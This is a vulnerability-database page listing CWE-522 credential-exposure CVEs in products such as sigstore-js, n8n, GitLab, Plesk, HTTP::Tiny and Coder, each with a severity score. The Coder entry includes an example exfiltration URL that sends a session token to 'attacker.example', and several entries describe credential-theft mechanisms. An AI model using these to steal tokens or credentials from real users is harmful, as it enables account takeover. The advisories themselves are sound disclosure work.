Skip to main content

CWE-522

Insufficiently Protected Credentials

857 CVEs Avg CVSS 7.0 MITRE
139
CRITICAL
290
HIGH
402
MEDIUM
23
LOW
165
POC
4
KEV

Monthly

CVE-2026-46458 HIGH PATCH This Week

Information disclosure in ICU Scandinavia Boomerang (versions prior to 2.4.18.029) lets an unauthenticated attacker retrieve plaintext service-account and SMTP credentials by requesting specific XML configuration files served as static content from the webroot. The exposed credentials enable follow-on compromise of connected mail and service accounts. No public exploit has been identified at time of analysis, and the issue is not listed in CISA KEV; the vendor CVSS 4.0 base score is 7.1 (High).

Information Disclosure Boomerang
NVD
CVSS 4.0
7.1
EPSS
0.2%
CVE-2026-48295 HIGH This Week

CAI Content Credentials is affected by an Insufficiently Protected Credentials vulnerability that could result in disclosure of sensitive information. An attacker could leverage this vulnerability to gain unauthorized read access. Exploitation of this issue does not require user interaction.

Information Disclosure C2Pa C2Pa Web C2Patool
NVD
CVSS 3.1
7.5
EPSS
0.4%
CVE-2026-47282 MEDIUM PATCH Exploit Unlikely This Month

Insufficiently protected credentials in GitHub Copilot and Visual Studio Code allows an unauthorized attacker to disclose information over a network.

Information Disclosure Visual Studio Code
NVD VulDB
CVSS 3.1
6.5
EPSS
0.6%
CVE-2026-59891 CRITICAL PATCH Act Now

Credential leakage in sigstore-js (specifically the @sigstore/oci package) before 0.7.1 allows Docker registry credentials to be transmitted to the wrong registry because getRegistryCredentials() matched configured auth keys against the target registry using a substring check instead of an exact host match. An attacker who can induce a victim to push or pull signatures/attestations against an attacker-named registry whose hostname has a substring relationship with a legitimately configured registry (e.g. 'cr.io' vs 'ghcr.io', or 'victim.127.0.0.1:5000' vs '127.0.0.1:5000') can capture the victim's stored registry credentials. There is no public exploit identified at time of analysis, and this is not listed in CISA KEV; the underlying weakness (CWE-522) is confirmed and fixed by the vendor in @sigstore/oci 0.7.1.

Docker Information Disclosure Sigstore Js
NVD GitHub
CVSS 3.1
9.6
EPSS
0.3%
CVE-2026-59209 HIGH PATCH This Week

Credential disclosure in n8n workflow automation (versions prior to 1.123.61, 2.27.4, and 2.28.1) allows an authenticated member holding use-only editor access to a shared workflow to read credential-populated HTTP headers via the $request object inside an HTTP Request node's pagination expression, then exfiltrate the secret through returned item data. This defeats n8n's credential-hiding model, which is supposed to prevent low-privilege collaborators from seeing the underlying secret values. No public exploit identified at time of analysis, and it is not listed in CISA KEV; the EPSS/POC signals were not provided.

Information Disclosure N8n
NVD GitHub VulDB
CVSS 4.0
7.1
EPSS
0.3%
CVE-2026-11827 MEDIUM PATCH This Month

Credential disclosure in GitLab Enterprise Edition allows an authenticated maintainer-role user to retrieve another user's stored credentials through insufficient authorization controls. All GitLab EE versions from 9.5 through the patched releases (18.11.7, 19.0.4, and 19.1.2) are affected, representing a broad historical exposure window spanning multiple major releases. No public exploit identified at time of analysis; the vulnerability was disclosed via HackerOne responsible disclosure (report 3720483), and GitLab has issued patched versions.

Gitlab Information Disclosure Red Hat
NVD VulDB
CVSS 3.1
4.9
EPSS
0.3%
CVE-2026-56843 CRITICAL PATCH Act Now

Cross-tenant credential disclosure in WebPros Plesk before 18.0.78.4 allows a low-privileged authenticated customer to enumerate domains belonging to other tenants through the XML-RPC API, because ownership checks are applied only to certain lookup filters and schema validation is skipped for legacy protocol versions. Because affected FTP credentials are stored in cleartext, an attacker retrieves another tenant's FTP password and can pivot to executing code as that tenant's system user. No public exploit has been identified at time of analysis, but the flaw was reported via HackerOne and carries a CVSS 9.9 rating.

Authentication Bypass Plesk
NVD VulDB
CVSS 3.1
9.9
EPSS
0.3%
CVE-2026-7017 HIGH PATCH This Week

Credential leakage in the Perl HTTP::Tiny client (all versions before 0.095) lets an attacker who controls a redirect destination harvest sensitive headers. When a server answers with a 3xx redirect, HTTP::Tiny re-sends caller-supplied Authorization, Cookie and Proxy-Authorization headers to the new host without verifying it shares the original origin, including across scheme, host or port boundaries and over https-to-http downgrades that expose them in cleartext on the wire. No public exploit is identified at time of analysis and CISA SSVC rates exploitation as none, but the flaw is well-documented and a vendor patch is available in 0.095.

Information Disclosure Http
NVD GitHub VulDB
CVSS 3.1
7.1
EPSS
0.3%
CVE-2026-55431 Go MEDIUM PATCH GHSA This Month

Session token leakage in Coder's CLI (github.com/coder/coder v2) lets a malicious template author steal a user's session token when the victim runs `coder open app`. The `coder open app` command opens external workspace-app URLs without scheme/host validation and substitutes the `$SESSION_TOKEN` placeholder with the user's real token before passing the URL to the OS open handler, so a workspace-controlled URL like `https://attacker.example/?t=$SESSION_TOKEN` exfiltrates the token and enables full account impersonation for its lifetime; the same path can invoke arbitrary local URI-scheme handlers. No public exploit identified at time of analysis, and it is not listed in CISA KEV.

RCE
NVD GitHub
CVSS 3.1
6.1
EPSS
0.4%
CVE-2026-1433 MEDIUM This Month

Information disclosure in uniFLOW Universal Login Manager (ULM) Standalone exposes sensitive SMTP and LDAP integration configuration data to authenticated administrators via the Remote User Interface (RUI). The flaw, classified under CWE-522 (Insufficiently Protected Credentials), applies exclusively to Standalone ULM deployments - environments integrated with uniFLOW Server or uniFLOW Online are explicitly confirmed unaffected. No public exploit code has been identified at time of analysis, and exploitation requires high-privilege access on an adjacent network, substantially limiting real-world risk.

Information Disclosure Uniflow Ulm Universal Login Manager Standalone
NVD
CVSS 4.0
4.8
EPSS
0.2%
EPSS 0% CVSS 7.1
HIGH PATCH This Week

Information disclosure in ICU Scandinavia Boomerang (versions prior to 2.4.18.029) lets an unauthenticated attacker retrieve plaintext service-account and SMTP credentials by requesting specific XML configuration files served as static content from the webroot. The exposed credentials enable follow-on compromise of connected mail and service accounts. No public exploit has been identified at time of analysis, and the issue is not listed in CISA KEV; the vendor CVSS 4.0 base score is 7.1 (High).

Information Disclosure Boomerang
NVD
EPSS 0% CVSS 7.5
HIGH This Week

CAI Content Credentials is affected by an Insufficiently Protected Credentials vulnerability that could result in disclosure of sensitive information. An attacker could leverage this vulnerability to gain unauthorized read access. Exploitation of this issue does not require user interaction.

Information Disclosure C2Pa C2Pa Web +1
NVD
EPSS 1% CVSS 6.5
MEDIUM PATCH Exploit Unlikely This Month

Insufficiently protected credentials in GitHub Copilot and Visual Studio Code allows an unauthorized attacker to disclose information over a network.

Information Disclosure Visual Studio Code
NVD VulDB
EPSS 0% CVSS 9.6
CRITICAL PATCH Act Now

Credential leakage in sigstore-js (specifically the @sigstore/oci package) before 0.7.1 allows Docker registry credentials to be transmitted to the wrong registry because getRegistryCredentials() matched configured auth keys against the target registry using a substring check instead of an exact host match. An attacker who can induce a victim to push or pull signatures/attestations against an attacker-named registry whose hostname has a substring relationship with a legitimately configured registry (e.g. 'cr.io' vs 'ghcr.io', or 'victim.127.0.0.1:5000' vs '127.0.0.1:5000') can capture the victim's stored registry credentials. There is no public exploit identified at time of analysis, and this is not listed in CISA KEV; the underlying weakness (CWE-522) is confirmed and fixed by the vendor in @sigstore/oci 0.7.1.

Docker Information Disclosure Sigstore Js
NVD GitHub
EPSS 0% CVSS 7.1
HIGH PATCH This Week

Credential disclosure in n8n workflow automation (versions prior to 1.123.61, 2.27.4, and 2.28.1) allows an authenticated member holding use-only editor access to a shared workflow to read credential-populated HTTP headers via the $request object inside an HTTP Request node's pagination expression, then exfiltrate the secret through returned item data. This defeats n8n's credential-hiding model, which is supposed to prevent low-privilege collaborators from seeing the underlying secret values. No public exploit identified at time of analysis, and it is not listed in CISA KEV; the EPSS/POC signals were not provided.

Information Disclosure N8n
NVD GitHub VulDB
EPSS 0% CVSS 4.9
MEDIUM PATCH This Month

Credential disclosure in GitLab Enterprise Edition allows an authenticated maintainer-role user to retrieve another user's stored credentials through insufficient authorization controls. All GitLab EE versions from 9.5 through the patched releases (18.11.7, 19.0.4, and 19.1.2) are affected, representing a broad historical exposure window spanning multiple major releases. No public exploit identified at time of analysis; the vulnerability was disclosed via HackerOne responsible disclosure (report 3720483), and GitLab has issued patched versions.

Gitlab Information Disclosure Red Hat
NVD VulDB
EPSS 0% CVSS 9.9
CRITICAL PATCH Act Now

Cross-tenant credential disclosure in WebPros Plesk before 18.0.78.4 allows a low-privileged authenticated customer to enumerate domains belonging to other tenants through the XML-RPC API, because ownership checks are applied only to certain lookup filters and schema validation is skipped for legacy protocol versions. Because affected FTP credentials are stored in cleartext, an attacker retrieves another tenant's FTP password and can pivot to executing code as that tenant's system user. No public exploit has been identified at time of analysis, but the flaw was reported via HackerOne and carries a CVSS 9.9 rating.

Authentication Bypass Plesk
NVD VulDB
EPSS 0% CVSS 7.1
HIGH PATCH This Week

Credential leakage in the Perl HTTP::Tiny client (all versions before 0.095) lets an attacker who controls a redirect destination harvest sensitive headers. When a server answers with a 3xx redirect, HTTP::Tiny re-sends caller-supplied Authorization, Cookie and Proxy-Authorization headers to the new host without verifying it shares the original origin, including across scheme, host or port boundaries and over https-to-http downgrades that expose them in cleartext on the wire. No public exploit is identified at time of analysis and CISA SSVC rates exploitation as none, but the flaw is well-documented and a vendor patch is available in 0.095.

Information Disclosure Http
NVD GitHub VulDB
EPSS 0% CVSS 6.1
MEDIUM PATCH This Month

Session token leakage in Coder's CLI (github.com/coder/coder v2) lets a malicious template author steal a user's session token when the victim runs `coder open app`. The `coder open app` command opens external workspace-app URLs without scheme/host validation and substitutes the `$SESSION_TOKEN` placeholder with the user's real token before passing the URL to the OS open handler, so a workspace-controlled URL like `https://attacker.example/?t=$SESSION_TOKEN` exfiltrates the token and enables full account impersonation for its lifetime; the same path can invoke arbitrary local URI-scheme handlers. No public exploit identified at time of analysis, and it is not listed in CISA KEV.

RCE
NVD GitHub
EPSS 0% CVSS 4.8
MEDIUM This Month

Information disclosure in uniFLOW Universal Login Manager (ULM) Standalone exposes sensitive SMTP and LDAP integration configuration data to authenticated administrators via the Remote User Interface (RUI). The flaw, classified under CWE-522 (Insufficiently Protected Credentials), applies exclusively to Standalone ULM deployments - environments integrated with uniFLOW Server or uniFLOW Online are explicitly confirmed unaffected. No public exploit code has been identified at time of analysis, and exploitation requires high-privilege access on an adjacent network, substantially limiting real-world risk.

Information Disclosure Uniflow Ulm Universal Login Manager Standalone
NVD

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy